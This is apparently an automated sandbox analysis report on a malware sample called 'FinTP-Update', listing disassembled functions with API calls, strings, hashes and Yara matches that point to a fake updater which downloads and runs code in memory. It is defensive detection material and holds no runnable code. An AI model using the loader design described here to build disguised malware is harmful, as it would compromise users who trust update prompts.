18987 17f38ad184d _snprintf strrchr _DllMainCRTStartup 18987->18981 18989 17f38ac9d64 _DllMainCRTStartup 18988->18989 18990 17f38ac9d7f WSASocketA 18989->18990 18991 17f38ac9da8 WSAIoctl 18990->18991 18992 17f38ac9da1 18990->18992 18994 17f38ac9de9 closesocket 18991->18994 18992->18987 18994->18992 19002 17f38ac9e68 18995->19002 18997 17f38ac9d7f WSASocketA 18998 17f38ac9da8 WSAIoctl 18997->18998 18999 17f38ac9da1 18997->18999 19001 17f38ac9de9 closesocket 18998->19001 18999->18977 19001->18999 19003 17f38ac9e7c 19002->19003 19003->18997 19004 17f38ac7730 19005 17f38ac7769 _DllMainCRTStartup 19004->19005 19006 17f38ac7860 InternetConnectA 19005->19006 19007 17f38ac7771 _DllMainCRTStartup 19005->19007 19006->19007 19008 17f36ae1090 19009 17f36ae10a9 19008->19009 19011 17f36ae10be 19009->19011 19012 17f36ae0fb0 19009->19012 19013 17f36ae0fc3 19012->19013 19014 17f36ae0fce SleepEx 19013->19014 19015 17f36ae0fde 19013->19015 19014->19015 19015->19011

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FF7193C1270 Relevance: 76.0, APIs: 37, Strings: 6, Instructions: 700networkstringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$memcpy$closesocketinet_addrmemcmpmemsetrecvstrstr$connectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                                                                                                              • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                                                                                                              • API String ID: 338878132-2968714747
                                                                                                                              • Opcode ID: f4544bdd155f1d28083635d9b932877552d55bbdf9cf6c65b63fa57cc515c7a3
                                                                                                                              • Instruction ID: 87ff23f1e8e077276e014ddaddf721f4f49729c04da42b0bf13dc135d96b35e2
                                                                                                                              • Opcode Fuzzy Hash: f4544bdd155f1d28083635d9b932877552d55bbdf9cf6c65b63fa57cc515c7a3
                                                                                                                              • Instruction Fuzzy Hash: 0652B362F28E8184FB00AFA4D4402BDA771FB457B8F90423ADA5D16AD9DF7CD18A9310
                                                                                                                              Function 0000017F38AD17A8 Relevance: 4.7, APIs: 3, Instructions: 193stringCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser_snprintfmallocstrrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1238167203-0
                                                                                                                              • Opcode ID: c24ca2868907c159accd8f7be344c53e6b7ed4974712dc99e21be6ab25bf09ce
                                                                                                                              • Instruction ID: 5d1d2f5e2a0f357abcd911f09cf4587fb932f50d976b577d25fa0a13895527d0
                                                                                                                              • Opcode Fuzzy Hash: c24ca2868907c159accd8f7be344c53e6b7ed4974712dc99e21be6ab25bf09ce
                                                                                                                              • Instruction Fuzzy Hash: 5A51843075CA081FEF48AB6894517EA72E2F799710F10453EE49FC3293DA28D847C7A6
                                                                                                                              Function 0000017F38AC7730 Relevance: 1.7, APIs: 1, Instructions: 175networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$ConnectInternetfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 965413-0
                                                                                                                              • Opcode ID: 5aabf42a8016127458e22bf438d3e268bf8595d0ceb33982a71ba00672c520a2
                                                                                                                              • Instruction ID: a86fbde699836e57c25f2066cfc18ded4e1ac0b3dbde3d3e1c14732908e81840
                                                                                                                              • Opcode Fuzzy Hash: 5aabf42a8016127458e22bf438d3e268bf8595d0ceb33982a71ba00672c520a2
                                                                                                                              • Instruction Fuzzy Hash: B141537065C7488FDB68DF28D48677AB3E5F788300F11467EA49EC3652DE34D8428B82
                                                                                                                              Function 0000017F38ADA30C Relevance: .3, Instructions: 256COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: a351bf691c5bdb53e2b7e774b1a1d9c194311787cdf8ded2f5e394424e519b03
                                                                                                                              • Instruction ID: 834c4133f00277bfa822f1d3b5ddd0b92654e2ada826ab11ff4a1938458e7504
                                                                                                                              • Opcode Fuzzy Hash: a351bf691c5bdb53e2b7e774b1a1d9c194311787cdf8ded2f5e394424e519b03
                                                                                                                              • Instruction Fuzzy Hash: 4971823075CA089BDB589F2C94563BB73E1F798301F21563EA45FC3292DE78E806C691
                                                                                                                              Function 0000017F38AD9F44 Relevance: .2, Instructions: 250COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: 87192b8403120d693fe24ea079f8caafcfb62f8a7e8f8da486ee7cecc701e9b1
                                                                                                                              • Instruction ID: 7fe21b564331d4a2828de460e6bd1428267c821266c35b3bf845d84a00da859f
                                                                                                                              • Opcode Fuzzy Hash: 87192b8403120d693fe24ea079f8caafcfb62f8a7e8f8da486ee7cecc701e9b1
                                                                                                                              • Instruction Fuzzy Hash: 5071743075CA089BEB699F2898553AB73F5F798301F11963EE45FC3292DE38D8068791
                                                                                                                              Function 0000017F38ADA1AC Relevance: .1, Instructions: 123COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: b74e7394ccdf12cbb4f8910d633926de710000661419715a8c12651b1650f032
                                                                                                                              • Instruction ID: 712eeb17102d73491350a036f814b3c7797afb02e1fbf3979a2cf3445cd7d2d4
                                                                                                                              • Opcode Fuzzy Hash: b74e7394ccdf12cbb4f8910d633926de710000661419715a8c12651b1650f032
                                                                                                                              • Instruction Fuzzy Hash: 8D319E3068CA089FEB94EF2C985476B73E5F798301F20493E945FC32A1DA39D846C7A1
                                                                                                                              Function 00007FF7193C1850 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 281networkstringCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 186 7ff7193c1850-7ff7193c18fd call 7ff7193c1270 socket 189 7ff7193c18ff-7ff7193c190e inet_addr 186->189 190 7ff7193c197d 186->190 191 7ff7193c1910-7ff7193c1916 gethostbyname 189->191 192 7ff7193c1918-7ff7193c192f inet_addr gethostbyaddr 189->192 193 7ff7193c1980-7ff7193c19a7 call 7ff7193c1070 190->193 195 7ff7193c1935-7ff7193c1938 191->195 192->195 199 7ff7193c19b0-7ff7193c19c2 193->199 197 7ff7193c1974-7ff7193c1977 closesocket 195->197 198 7ff7193c193a-7ff7193c1972 htons connect 195->198 197->190 198->193 198->197 199->199 200 7ff7193c19c4-7ff7193c19cb 199->200 201 7ff7193c19d0-7ff7193c19d7 200->201 201->201 202 7ff7193c19d9-7ff7193c1a15 call 7ff7193c1070 201->202 205 7ff7193c1a18-7ff7193c1a1e 202->205 205->205 206 7ff7193c1a20-7ff7193c1a29 205->206 207 7ff7193c1a30-7ff7193c1a3d 206->207 207->207 208 7ff7193c1a3f-7ff7193c1a43 207->208 209 7ff7193c1a46-7ff7193c1a4d 208->209 209->209 210 7ff7193c1a4f-7ff7193c1a6a 209->210 211 7ff7193c1a70-7ff7193c1a77 210->211 211->211 212 7ff7193c1a79-7ff7193c1a8d 211->212 213 7ff7193c1a90-7ff7193c1a98 212->213 213->213 214 7ff7193c1a9a-7ff7193c1ade send memset recv 213->214 215 7ff7193c1b40-7ff7193c1b53 strstr 214->215 216 7ff7193c1ae0-7ff7193c1b3e realloc memcpy memset recv 214->216 217 7ff7193c1b55-7ff7193c1b68 strstr 215->217 218 7ff7193c1b6a-7ff7193c1b6c 215->218 216->215 216->216 217->218 219 7ff7193c1b6f-7ff7193c1be2 call 7ff7193c1f58 memcpy call 7ff7193c1f58 strncpy call 7ff7193c1f50 closesocket 217->219 218->219 226 7ff7193c1be4-7ff7193c1bf5 219->226 227 7ff7193c1c19-7ff7193c1c22 219->227 230 7ff7193c1c13-7ff7193c1c18 call 7ff7193c1f50 226->230 231 7ff7193c1bf7-7ff7193c1c0a 226->231 228 7ff7193c1c24-7ff7193c1c36 227->228 229 7ff7193c1c59-7ff7193c1c75 227->229 233 7ff7193c1c54 call 7ff7193c1f50 228->233 234 7ff7193c1c38-7ff7193c1c4b 228->234 235 7ff7193c1c77-7ff7193c1c89 229->235 236 7ff7193c1cac-7ff7193c1cd8 call 7ff7193c1ef0 229->236 230->227 231->230 237 7ff7193c1c0c-7ff7193c1c12 _invalid_parameter_noinfo_noreturn 231->237 233->229 234->233 240 7ff7193c1c4d-7ff7193c1c53 _invalid_parameter_noinfo_noreturn 234->240 242 7ff7193c1ca7 call 7ff7193c1f50 235->242 243 7ff7193c1c8b-7ff7193c1c9e 235->243 237->230 240->233 242->236 243->242 245 7ff7193c1ca0-7ff7193c1ca6 _invalid_parameter_noinfo_noreturn 243->245 245->242
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$memcpy$closesocketinet_addrmemsetrecvstrstr$connectgethostbyaddrgethostbynamehtonsmemcmpreallocsendsocketstrncpy
                                                                                                                              • String ID: $$GET %s HTTP/1.0$Host: %s
                                                                                                                              • API String ID: 1237530833-1199678302
                                                                                                                              • Opcode ID: 491bdc39617c2d4fbda6a589d3acd15e0bc547e4d127c979532ea07d9f50ec93
                                                                                                                              • Instruction ID: fe9858fe3cfa5e2aa2f82f2a246023439e8c8143196b7fc6be13d190e29b069e
                                                                                                                              • Opcode Fuzzy Hash: 491bdc39617c2d4fbda6a589d3acd15e0bc547e4d127c979532ea07d9f50ec93
                                                                                                                              • Instruction Fuzzy Hash: 9BC1C722A28EC294FB11AF65D4403A9A771FB857B8F80423ADA5D437E9DF7CD14AC710
                                                                                                                              Function 00007FF7193C10D0 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 88memorynetworksynchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SleepVirtualWindowprintf$AllocCleanupConsoleCreateObjectProtectShowSingleStartupThreadWaitmemcpy
                                                                                                                              • String ID: Update complete !$Updating application ...
                                                                                                                              • API String ID: 2191805314-1739653217
                                                                                                                              • Opcode ID: ea505142da3b1c8c6b0211f56f9505a3b07cd727c9395d2fbfd05c6d3ee2bf9c
                                                                                                                              • Instruction ID: d9091ece72d481c4cfcc3c61b69cc5d7eb71a296d0caaea2a4b3c15441d5a9b2
                                                                                                                              • Opcode Fuzzy Hash: ea505142da3b1c8c6b0211f56f9505a3b07cd727c9395d2fbfd05c6d3ee2bf9c
                                                                                                                              • Instruction Fuzzy Hash: 26417821A2CE8285E750AF61E4503BAB370FB857A8F84403ADA8E53759CF3DE14E9710
                                                                                                                              Function 00007FF7193C2044 Relevance: 22.6, APIs: 15, Instructions: 94COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1818695170-0
                                                                                                                              • Opcode ID: e4a4f67a1c2f8c8663ba82bb76dce1e56913a2b9a4e96379217b23346b38f8d0
                                                                                                                              • Instruction ID: 482b28af650912f0354e38f8d9484b01f08dd1394b4ef7ce295e5b7aa4a4365d
                                                                                                                              • Opcode Fuzzy Hash: e4a4f67a1c2f8c8663ba82bb76dce1e56913a2b9a4e96379217b23346b38f8d0
                                                                                                                              • Instruction Fuzzy Hash: AB312A21A28E4341EA14BF2194153B9D3B1AF557ACFC0403FEA4E172D7CE6DE54E8230
                                                                                                                              Function 0000017F38AC9358 Relevance: 7.8, APIs: 5, Instructions: 260networkCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _snprintf$strchr$AvailableDataInternetQuery_errno_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2459009813-0
                                                                                                                              • Opcode ID: 1aad2df4db7f9b33c718916bc1ec6991ba60bfa05de455732afd7a7ac3088db8
                                                                                                                              • Instruction ID: e506d4d2fa7ad6d663e29ee7721b1c63452070761e351ce554fcb8418384b831
                                                                                                                              • Opcode Fuzzy Hash: 1aad2df4db7f9b33c718916bc1ec6991ba60bfa05de455732afd7a7ac3088db8
                                                                                                                              • Instruction Fuzzy Hash: 5E81CF3065CA488FEB58EB28D8956FAB3F5FB94301F00052EE45BC3292DA68D906C791
                                                                                                                              Function 0000017F38AC9D64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103networkCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: IoctlSocketclosesocket
                                                                                                                              • String ID: _Cy
                                                                                                                              • API String ID: 3445158922-1085951347
                                                                                                                              • Opcode ID: 7ade8901dc0e9bc1a44b3ba1fcf56bbacaca6f1dd20d958bee93b1ad89b8896f
                                                                                                                              • Instruction ID: 8a51113d4d58a6838b850217c3c2503cb854ca9e93c419c7a3b27b9b238f6e50
                                                                                                                              • Opcode Fuzzy Hash: 7ade8901dc0e9bc1a44b3ba1fcf56bbacaca6f1dd20d958bee93b1ad89b8896f
                                                                                                                              • Instruction Fuzzy Hash: 4631933065CB488BDB949F28D8843AAB7F5FBA8315F14067EE45EC3191EB34C452C741
                                                                                                                              Function 0000017F38AC78C4 Relevance: 1.6, APIs: 1, Instructions: 117networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$InternetOpenfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2307133132-0
                                                                                                                              • Opcode ID: b2e8de380762abf8ea4d3ef2843784360b0cc5212c0f5113b7e3339b7f98fd85
                                                                                                                              • Instruction ID: 0498331f1e05bdfc78de534579d2094cc78427799eb1a613226da1027fbb77ac
                                                                                                                              • Opcode Fuzzy Hash: b2e8de380762abf8ea4d3ef2843784360b0cc5212c0f5113b7e3339b7f98fd85
                                                                                                                              • Instruction Fuzzy Hash: ED316F31A5C6488BDB68EE38944227BB3E1F799315F119A3EA09FC3642DE35D8038781
                                                                                                                              Function 0000017F36AE0FB0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3357889080.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017F36AE0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f36ae0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 828da02b92ecf590f0f370cdf11f92f09e128223337482a552d2b00b7cfb072a
                                                                                                                              • Instruction ID: b173d192f2c6839ac3f6a891eca96d2ea57dd4adaf522b940a4ca59579add0ca
                                                                                                                              • Opcode Fuzzy Hash: 828da02b92ecf590f0f370cdf11f92f09e128223337482a552d2b00b7cfb072a
                                                                                                                              • Instruction Fuzzy Hash: F901B630128A489FEA84EB18C499FAAB7E1FB84701F84586CF059C32D2C6249C91DB01

                                                                                                                              Non-executed Functions

                                                                                                                              Function 0000017F38AE0CDC Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 3613058218-1077428164
                                                                                                                              • Opcode ID: 5b0677129746c5e641d238aafdfd8f825d1c5b663ef83c096bbd024f921d9b13
                                                                                                                              • Instruction ID: f63a3546dca0948a3488463eca49ddcf31f114fbaf2051ba9a48672caa5347be
                                                                                                                              • Opcode Fuzzy Hash: 5b0677129746c5e641d238aafdfd8f825d1c5b663ef83c096bbd024f921d9b13
                                                                                                                              • Instruction Fuzzy Hash: 6462D63099C6699AEF68AA58C4513EBF7F1FB55302F24093DD4ABC37D1D62CA803C661
                                                                                                                              Function 0000017F38AE0274 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3613058218-3916222277
                                                                                                                              • Opcode ID: efe04834c9c52b6c82cb06a2b6ce24504f7a3b8eb651434d1436ff47e6ed4f74
                                                                                                                              • Instruction ID: 5b21d32e03addf1b189d5165d87b839ad5632d76b0acf7d14d1c1433d39900e7
                                                                                                                              • Opcode Fuzzy Hash: efe04834c9c52b6c82cb06a2b6ce24504f7a3b8eb651434d1436ff47e6ed4f74
                                                                                                                              • Instruction Fuzzy Hash: D262EA3099CA499AFF68AA5894513EB77F1FB95300F24493DD4AFC33D2D62CA803D661
                                                                                                                              Function 0000017F38AE3984 Relevance: 28.7, APIs: 14, Strings: 2, Instructions: 678COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                              • String ID: @$U
                                                                                                                              • API String ID: 3902385426-1013562545
                                                                                                                              • Opcode ID: 41868c28f8d137dea5cf0ce0dd7f38ed136a82522b4c3818ae4a04fefbd99508
                                                                                                                              • Instruction ID: a36a315faf1c51da960ef30b13f9807d40b43839828aad2b2fb9c933728f326b
                                                                                                                              • Opcode Fuzzy Hash: 41868c28f8d137dea5cf0ce0dd7f38ed136a82522b4c3818ae4a04fefbd99508
                                                                                                                              • Instruction Fuzzy Hash: 1022B33015CA489BEB28BB18C8857EBB7F1FBD5300F10093DE59AC3292DA3DE946C655
                                                                                                                              Function 0000017F38AD3534 Relevance: 13.3, APIs: 10, Instructions: 790COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _snprintf$_errno_flsbuf_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3206768600-0
                                                                                                                              • Opcode ID: 2f5fa6688b9c8f5a6b87aeccace7b411b410f6383500c904992cea95a9c01413
                                                                                                                              • Instruction ID: 49337f04d814a6ba1a017532d9ea1b7b5cd67c610e914731048b05b709531cbc
                                                                                                                              • Opcode Fuzzy Hash: 2f5fa6688b9c8f5a6b87aeccace7b411b410f6383500c904992cea95a9c01413
                                                                                                                              • Instruction Fuzzy Hash: 2A52913055CD84AAEB59AB2CD4117E6F3F0FFA8305F445228D99AC7152EB38E587C7A0
                                                                                                                              Function 0000017F38AC5DD0 Relevance: 5.5, APIs: 4, Instructions: 522COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$_snprintf$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 132319360-0
                                                                                                                              • Opcode ID: 14da4661c7deebced807616e984bea43d344ea1cc427452d8eefa305cda0c36c
                                                                                                                              • Instruction ID: 3e51e436c57f367f3d7b51a053972bef635c9dde1d29b3ea7762e556c521c88e
                                                                                                                              • Opcode Fuzzy Hash: 14da4661c7deebced807616e984bea43d344ea1cc427452d8eefa305cda0c36c
                                                                                                                              • Instruction Fuzzy Hash: A9023E3064CA045AEF58FB68D4A67EA72B1FB84300F50453DA56EC32D7DE2C990BC6B5
                                                                                                                              Function 0000017F38ADD880 Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _initp_misc_winsig
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2710132595-0
